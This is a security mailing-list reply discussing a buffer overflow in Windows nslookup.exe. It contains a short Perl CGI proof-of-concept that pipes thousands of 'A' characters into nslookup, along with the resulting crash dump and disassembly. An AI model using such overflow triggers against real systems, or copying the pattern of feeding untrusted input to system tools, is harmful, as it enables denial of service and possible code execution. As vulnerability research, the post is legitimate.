Re: NSLOOKUP.EXE

==begin silly.cgi

#!perl -w

use strict;
print "Content-type: text/html\n\n";

open(NSLOOKUP,"|nslookup.exe") || die "Could not open nslookup.exe (path?)";

        print NSLOOKUP "A" x 6489;
close(NSLOOKUP);

==end silly.cgi

MSDE:
Unhandled exception at 0x01004d65 in NSLOOKUP.EXE: 0xC0000005: Access violation writing location 0x0103e000.

     01004D5D  cmp         esi,100F770h 
     01004D63  je          01004D6F 

---> 01004D65  mov         dword ptr [edi],esi 


     01004D67  add         edi,4 
     01004D6A  jmp         01004C37 

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

01004D65 = 16797029

,_____________________________________________________,
\ Ryan Yagatich                     support@pantek.com \
/ Pantek Incorporated                  (877) LINUX-FIX /
\ 
http://www.pantek.com/security        (440) 519-1802 \
/       Are your networks secure? Are you certain?     /

>Patrick Webster wrote:
>> Can you do anything interesting with this?:
>> 
>> C:\>nslookup
>> Default Server:  dns.server.net
>> Address:  111.222.333.444
>> 
>> 
>>>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> 
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>> 
>> Gives error: memory can't be "read" - 0x414141 (aka A).
>
>If you have to manually type all the A's, then probably not.  Maybe if 
>someone did something silly like make a CGI script that calls nslookup.exe 
>directly with user input.
>
>What OS are you testing on?  It looks like it's fixed in XP:
>
>C:\winxp\system32>nslookup
>Default Server:  dns1.snfcca.sbcglobal.net
>Address:  206.13.28.12
>
> > 
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
>*** Input is too long
> >
>
>
>					BB
>